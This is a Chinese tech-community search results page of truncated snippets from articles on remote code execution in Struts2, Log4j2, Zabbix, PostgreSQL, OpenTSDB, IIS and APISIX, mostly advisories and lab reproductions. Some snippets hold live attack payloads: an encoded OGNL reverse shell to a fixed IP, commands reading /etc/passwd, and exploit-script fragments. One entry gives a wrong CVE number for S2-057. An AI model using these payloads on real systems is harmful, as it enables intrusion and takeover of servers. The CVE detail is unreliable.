首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏技术杂记

    可靠的远程代码执行(2)

    尽管 CS:GO 代码Content-Length由于其区分大小写的搜索而错过了第二个标头,并且仍然需要1337正文数据字节,但 cURL 使用最后一个标头并立即完成请求。 CS:GO 代码然后将分配的缓冲区以及缓冲区中包含的所有未初始化的内存内容(包括指针)写入磁盘。 它的定义如下: message CNETMsg_File { optional int32 transfer_id = 1; optional string file_name = 2; optional 消息通知客户端: message CMsg_CVars { message CVar { optional string name = 1; optional string value = 2; 下面是OOB访问发生的代码的反编译作为提醒: [reversed5.png] 由于数组和所有ConVars都位于 的.data部分engine.dll,我们可以可靠地设置player_slot参数,使得

    3.8K100发布于 2021-07-09
  • 来自专栏LuckySec网络安全

    S2-001远程代码执行复现

    例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行。 漏洞检测 Struts2 漏洞检测工具 https://github.com/HatBoy/Struts2-Scan 使用工具检测 s2-001 漏洞 python3 Struts2Scan.py 1、获取tomcat执行路径: %{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"} 2、获取Web路径: %{#req=@ new java.lang.String[]{"pwd"} 命令+参数格式:new java.lang.String[]{"cat","/etc/passwd"} 只需要在以下payload中找到上述代码 ,修改要执行的命令格式即可。

    947100编辑于 2022-11-02
  • 来自专栏LuckySec网络安全

    S2-009远程代码执行复现

    0x01 漏洞简介 Struts2对S2-003的修复方法是禁止#号,于是s2-005通过使用编码\u0023或\43来绕过;后来Struts2对S2-005的修复方法是禁止\等特殊符号,使用户不能提交反斜线 example=<OGNL statement>&(example)('xxx')=1的方法来执行它,从而绕过官方对#、\等特殊字符的防御。 漏洞检测 Struts2 漏洞检测工具 https://github.com/HatBoy/Struts2-Scan 使用工具检测 s2-009 漏洞 python3 Struts2Scan.py 有时候访问成功后会弹出一个下载文件,该文件里保存了命令执行结果。 s2-001/README.zh-cn.md

    69750编辑于 2022-11-02
  • 来自专栏安全学习

    S2-001 远程代码执行漏洞

    %27%2Fc%27%2C%23cmd%7D%3A%7B%27%2Fbin%2Fbash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23a%3D%28new%20java.lang.ProcessBuilder #f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close())}发现成功执行了 username=admin&password=%25%7B%28%23cmd%3D%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.146.158%2F9999% 200%3E%261%27%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27%2Fc%27%2C%23cmd%7D%3A%7B%27%2Fbin% 23b%29%2C%23d%3Dnew%20java.io.BufferedReader%28%23c%29%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read%28%

    53120编辑于 2022-12-22
  • 来自专栏LuckySec网络安全

    S2-007远程代码执行复现

    0x01 漏洞简介 S2-007漏洞一般出现在表单处。 vulhub官网地址:https://vulhub.org cd vulhub/struts2/s2-007 docker-compose build docker-compose up -d 0x03 0x04 漏洞利用 直接在年龄age框输入输入要执行的任意代码的EXP,点击登陆提交,页面会返回响应的执行结果。 如果执行结果返回的内容太多,可以通过查看网页源代码进行查看。 s2-007/README.zh-cn.md

    86520编辑于 2022-11-02
  • 来自专栏网络信息安全

    RCE远程代码执行

    RCE远程代码执行 一、漏洞介绍 概述 RCE(remote command/code execute)RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 远程系统命令执行 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口 比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上 一般会给用户提供一个ping操作的web 在这种平台上往往会出现远程系统命令执行的漏洞,不信的话现在就可以找你们运维部的系统测试一下,会有意想不到的"收获"-_- 远程代码执行 同样的道理,因为需求设计,后台有时候也会把用户的输入作为代码的一部分进行执行 ,也就造成了远程代码执行漏洞。 不管是使用了代码执行的函数,还是使用了不安全的反序列化等等。 因此,如果需要给前端用户提供操作类的API接口,一定需要对接口输入的内容进行严格的判断,比如实施严格的白名单策略会是一个比较好的方法。

    1K10编辑于 2024-03-12
  • 来自专栏HACK学习

    【漏洞预警】S2-057远程代码执行

    Struts2是apache项目下的一个web 框架,普遍应用于阿里巴巴、京东等互联网、政府、企业门户网站。 新漏洞刚被发现发布时,对很多企业网络来说可能是最危险的时刻,应对不及时而造成的危害可能是巨大的,特别是像Struts2 S2-057这样会搞死人的漏洞,显然黑客对他们的关注度比很多企业的安管人员要高的多 S2-057远程代码执行 漏洞简介 当namespace没有为基础xml配置中定义的结果设置值时,可以执行RCE攻击,同时,其上部操作配置没有或通配符namespace。 漏洞详情 l 危害等级:高危 l CVE编号:CVE-2018-5390 l 漏洞类型:远程代码执行 影响范围 Struts 2.3 - Struts 2.3.34 Struts 2.5 - Struts 2.5.16 处置建议 1.升级到Struts 2.3.35或Struts 2.5.17 2.临时解决方案: 验证您是否已namespace为基础xml配置中的所有已定义结果设置(并且始终不会忘记设置

    46320发布于 2019-08-07
  • 来自专栏安恒信息

    Struts2 s2-032远程代码执行分析

    介绍: Struts 2是Struts的下一代产品,是在 struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。 虽然从Struts 1到Struts 2有着太大的变化,但是相对于WebWork,Struts 2的变化很小。 4月15号安恒安全研究院在Struts 2上发现了一个严重的远程代码执行漏洞(CVE-2016-3081) ? 2. 漏洞分析 前提:开启动态方法调用。 ? login.action来执行动态的方法调用。 ActionProxy中的method属性取出来放入到ognlUtil.getValue(methodName + “()”, getStack().getContext(), action);方法中执行

    1.2K60发布于 2018-04-11
  • 来自专栏FreeBuf

    Struts2 s2-032远程代码执行分析

    介绍 Struts 2是Struts的下一代产品,是在 struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。 虽然从Struts 1到Struts 2有着太大的变化,但是相对于WebWork,Struts 2的变化很小。 4月15号安恒安全研究院在Struts 2上发现了一个严重的远程代码执行漏洞(CVE-2016-3081) ? 2. 漏洞分析 前提:开启动态方法调用。 login.action来执行动态的方法调用。 ActionProxy中的method属性取出来放入到ognlUtil.getValue(methodName + “()”, getStack().getContext(), action);方法中执行

    72160发布于 2018-02-08
  • 来自专栏安恒信息

    安全通告 | S2-053远程代码执行漏洞

    安全通告 S2-053远程代码执行漏洞 1. 漏洞描述 (S2-053/CVE-2017-12611) Struts2 REST插件存在远程代码执行漏洞,开发人员在使用表达式文本或Freemarker标签强制表达式和使用要求的值可能会导致远程代码执行攻击 2. 危害等级 中危 3. 影响范围 Struts 2.0.1 - Struts 2.3.33 Struts 2.5 - Struts 2.5.10 4. 利用方式 远程利用 5. 开发人员应避免在Freemarker的结构代码中使用可写的属性,或者使用只读属性来初始化value属性(仅限getter属性)。 2. 虽然S2-053的漏洞利用代码暂未公开,但最近的S2-052的漏洞利用代码已经公开,强烈建议更新到最新版本或使用WAF等措施缓解威胁。 - END -

    89460发布于 2018-04-10
  • 来自专栏CodeWwang

    Apache Log4j2远程代码执行漏洞

    漏洞原理 Apache Log4j2 中存在JNDI注入漏洞,当程序将用户输入的数据进行日志记录时,即可触发此漏洞,成功利用此漏洞可以在目标服务器上执行任意代码。 通俗简单的说就是:在打印日志的时候,如果你的日志内容中包含关键词 ${,攻击者就能将关键字所包含的内容当作变量来替换成任何攻击命令,并且执行 Apache Log4j2 是一款开源的 Java 日志记录工具 漏洞详情 Apache Log4j 远程代码执行漏洞 严重程度: 严重由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞。 2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。 由于Log4j2组件在处理程序日志记录时存在JNDI注入缺陷,未经授权的攻击者利用该漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限

    49630编辑于 2022-08-24
  • 来自专栏nginx遇上redis

    Apache Log4j 2远程代码执行漏洞

    该项目在Apache接手后进行了代码重构,解决了框架中的架构问题并在Log4j 2中提供了一个插件架构,这使其更具扩展性。 在进行递归查询时,JNDI方法在处理查询参数的过程中存在注入漏洞,攻击者可利用该漏洞在未授权的情况下,构造恶意参数以远程方式在目标服务器上执行恶意代码。 漏洞分析 在受影响版本中,攻击者可以利用该漏洞在未授权的情况下,构造恶意参数以远程方式在目标服务器上执行恶意代码,从而获取目标服务器的控制权限。 该漏洞以及已公开的POC进行分析,在Log4j 2组件的版本低于2.15 RC2的情况下均能成功执行任意代码,通过POC可以成功获得受害服务器返回的连接。 也可以通过查看内部JAVA源代码库中所引入的组件清单列表来确认是否引入了Apache Log4j 2.x的Jar包。

    87330编辑于 2021-12-13
  • 来自专栏尚国

    S2-057远程代码执行漏洞复现过程

    s2-048_struts2_1 ... done ⚡ root@HK  ~/vulhub/struts2/s2-048   master ●  ? 0x05 验证st2-057 docker 靶机:http://www.canyouseeme.cc:8080/struts2-showcase/ 命令执行:http://www.canyouseeme.cc :8080/struts2-showcase/${(111+111)}/actionChain1.action ${(111+111)} 得到执行结果返回在url中:http://www.canyouseeme.cc :8080/struts2-showcase/222/register2.action ? (%23b)%2c%23d%3dnew+char%5b51020%5d%2c%23c.read(%23d)%2c%23jas502n%3d+%40org.apache.struts2.ServletActionContext

    2.1K30发布于 2018-09-11
  • 来自专栏安全小圈

    Apache Struts2--061远程代码执行漏洞复现

    Apache Struts于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞,开发人员使用了 %{…} 语法,从而攻击者可以通过构Payload,从而造成远程代码执行。 该漏洞编号为 CVE-2020-17530 ,漏洞等级:高危 ,漏洞评分:7.5 S2-061是对S2-059沙盒进行的绕过! 2、访问漏洞环境 ? 3、测试漏洞是否存在 %25%7b+%27yunzui%27+%2b+(520+%2b+520).toString()%7d ? 执行效果 http://192.168.60.139:8080/?id=%25%7b+%27yunzui%27+%2b+(520+%2b+520).toString()%7d ? 2.exp进行命令执行 whoami 方法一 POST /index.action HTTP/1.1 Host: 192.168.60.139:8080 Accept-Encoding: gzip,

    1.4K10发布于 2020-12-29
  • 来自专栏python3

    python 远程执行代码 fabr

     fabric应用:                1、fab -H 172.23.177.40,172.23.177.41 host_type                2、fab host_type #从结果可以看到,fab只执行了属于web组的client。                                        run('uname -r')                     When this fabfile is run as fab -H host1,host2 mytask, env.hosts will then contain ['host1', 'host2', 'host3', 'host4'] at the time that mytask is executed run('uname -r')                run:                     fab test                resule: 从结果中可以看到,fab只执行

    76710发布于 2020-01-14
  • 来自专栏Khan安全团队

    OpenTSDB 2.4.0远程代码执行

    在Pentest期间,我们在yrange参数中使用命令注入在OpenTSDB 2.4.0及更低版本中发现了一个远程执行代码漏洞(其他参数可能也容易受到攻击) 当通过它被写入到其中的一个参数传递有效载荷的 gnuplot在文件/ TMP目录和gnuplot的文件由执行OpenTSDB经由/src/mygnuplot.sh壳脚本。 right boxset ylabel ""*set yrange [33:system('touch /tmp/poc.txt')]*plot "/tmp/d705ba5b_0.dat" using 1:2 title "sys.cpu.nice{host=web01, dc=lga}" 当OpenTSDB执行mygnuplot.sh的poc.txt文件将被写入到临时目录。

    1.3K10发布于 2021-03-10
  • 来自专栏Khan安全团队

    Zabbix 5.0.17 远程代码执行

    <password> <attacker ip> <attacker port>") sys.exit(-1) url = sys.argv[1] username =sys.argv[2] =s.post(url+"/items.php" ,data=data2,headers=headers,cookies={"tab":"0"} ) no_pages= r2.text.count( "form"] ="update" data2["selectedInterfaceId"] = "1" data2["check_now"]="Execute+now" data2.pop("add" ,None) data2["itemid"]=itemId, print(Fore.GREEN+f"[+] set the listener at {port} please...") r2 =s.post(url+"/items.php" ,data=data2,headers=headers,cookies={"tab":"0"}) # ,proxies=proxies ) print

    1.4K30编辑于 2022-03-21
  • 来自专栏漏洞知识库

    IIS - 远程代码执行漏洞

    漏洞知识库 网络安全/渗透测试/代码审计/ 关注 IIS - 远程代码执行漏洞 漏洞说明 开启WebDAV服务的IIS 6.0被爆存在缓存区溢出漏洞导致远程代码执行,目前针对Windows Server 准备工具 下载cve-2017-7269漏洞利用脚本 IIS代码执行脚本 - cve-2017-7269:https://github.com/zcgonvh/cve-2017-7269 下载好了,吧exp 我们用pr.exe执行whoami看看: ? 这个时候,我们就需要用3389这个提权工具开启远程服务器的3389端口: ? 这个就是整个提权的一个过程,包括成功的登陆到远程服务器! 漏洞防御 1、关闭WebDAV服务 2、使用相关防护设备

    2.7K20发布于 2019-11-20
  • 来自专栏Khan安全团队

    PostgreSQL 11.7 远程代码执行

    /usr/bin/python3 import psycopg2 import argparse import hashlib import time def parseArgs(): parser Connecting to PostgreSQL Database on {0}:{1}".format(args.ip, args.port)) connection = psycopg2. print ("[+] Add the argument -c [COMMAND] to execute a system command") except psycopg2. cursor.execute("DROP TABLE {0};".format(tableName)) cursor.close() except psycopg2.

    70040编辑于 2022-04-21
  • 来自专栏Khan安全团队

    Apache APISIX 远程代码执行

    of the admin API, which leads to remote LUA code execution through the script parameter added in the 2. |.]+)$}) server = Regexp.last_match(1) || nil version = Rex::Version.new(Regexp.last_match(2) version} http server header") return Exploit::CheckCode::Appears if version > Rex::Version.new('2'

    94120编辑于 2022-03-09
领券